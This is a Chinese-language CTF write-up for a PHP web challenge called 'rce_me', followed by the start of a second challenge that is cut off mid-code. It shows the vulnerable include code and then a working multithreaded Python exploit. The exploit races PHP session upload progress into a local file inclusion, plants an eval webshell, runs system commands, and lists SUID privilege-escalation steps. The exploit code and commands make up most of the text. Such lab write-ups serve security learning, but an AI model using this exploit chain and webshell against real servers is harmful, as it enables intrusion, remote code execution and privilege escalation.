web
rce_me
<?php
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
function fliter($var): bool{
$blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
foreach($blacklist as $blackword){
if(stristr($var, $blackword)) return False;
}
return True;
}
if(fliter($_SERVER["QUERY_STRING"]))
{
include $file;
}
else
{
die("Noooo0");
}
获取webshell,题目中过滤了很多字符,但是可以利用echo写shell,参考链接
https://blog.csdn.net/chizhaji/article/details/113521985?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&utm_relevant_index=1
发现需要同时发包,利用脚本也可以直接发包
# coding=utf-8
import io
import requests
import threading
sessid = 'flag'
data = {
"cmd": "system('cat f*');"}
url = "http://80.endpoint-9588ad86d7e34833b12f992204ec90da.dasc.buuoj.cn:81/"
def write(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = session.post(url,
data={
"PHP_SESSION_UPLOAD_PROGRESS":"<?php eval($_POST[cmd]);fputs(fopen('a.php','w'),'<?php @eval($_POST[wa1ki0g])?>');?>"},
files={
'file': ('tgao.txt', f)}, cookies={
'PHPSESSID': sessid})
def read(session):
while True:
resp = session.post(url+'?file=/tmp/sess_' + sessid,
data=data)
if 'tgao.txt' in resp.text:
print(resp.text)
event.clear()
else:
pass
if __name__ == "__main__":
event = threading.Event()
with requests.session() as session:
for i in range(1, 30):
threading.Thread(target=write, args=(session,)).start()
for i in range(1, 30):
threading.Thread(target=read, args=(session,)).start()
event.set()
脚本会响应10秒左右报错。但是shell上传成功
读取不到flag,需要提权
内核是Linux,考虑suid提权
find / -perm -u=s -type f 2>/dev/null
利用date来提权
获取flag
step_by_step-v3
<?php
error_reporting(0);
class yang
{
public $y1;
public function __construct()
{
$this->y1->magic();
}
public function __tostring()
{
($this->y1)();
}
public function hint()
{
include_once('hint.php');
if(isset($_GET['file']))
{
$file = $_GET['file']